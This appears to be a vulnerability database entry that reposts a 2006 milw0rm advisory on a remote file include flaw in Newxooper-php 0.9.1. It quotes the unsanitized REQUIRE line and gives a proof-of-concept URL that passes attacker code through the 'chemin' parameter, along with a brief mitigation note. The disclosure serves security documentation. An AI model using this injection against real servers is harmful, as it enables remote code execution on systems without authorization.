Newxooper-php v0.9.1(chemin) Remote File Include Vulnerability

vendor:

Newxoope

by:

Dr Max Virus

8,8

CVSS

HIGH

Remote File Include

CWE

Product Name: Newxoope

Affected Version From: 0.9.1

Affected Version To: 0.9.1

Patch Exists: NO

Related CWE: N/A

CPE: a:easy-script:newxoope

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Newxooper-php v0.9.1(chemin) Remote File Include Vulnerability

Newxooper-php v0.9.1 is vulnerable to a remote file include vulnerability. The vulnerability exists in the compteur/mapage.php file, in line 37, where the variable $chemin is not properly sanitized before being used in a REQUIRE statement. An attacker can exploit this vulnerability by sending a malicious URL to the vulnerable script, which will then include and execute the malicious code.

Mitigation:

Input validation should be used to prevent the inclusion of malicious files.

Source

Exploit-DB raw data:

###########################################################################################
#Newxooper-php v0.9.1(chemin) Remote File Include Vulnerabilty #
#Download:http://www.easy-script.com/newxoope-091.zip #
###########################################################################################
#Author:Dr Max Virus #
#Location:Egypt #
###########################################################################################
#Bug in compteur/mapage.php #
#In Line:37 #
#Vul Code: #
#REQUIRE ("$chemin/compteur/mapage.txt"); #
###########################################################################################
#POC: #
#http://[target]/[path]/compteur/mapage.php?chemin=Evil Code #
###########################################################################################
#Thx:str0ke & ajann &All friends #
#Special Gr33ts:AsianEagle & The master & Kacper & Hotturk #
###########################################################################################

# milw0rm.com [2006-12-21]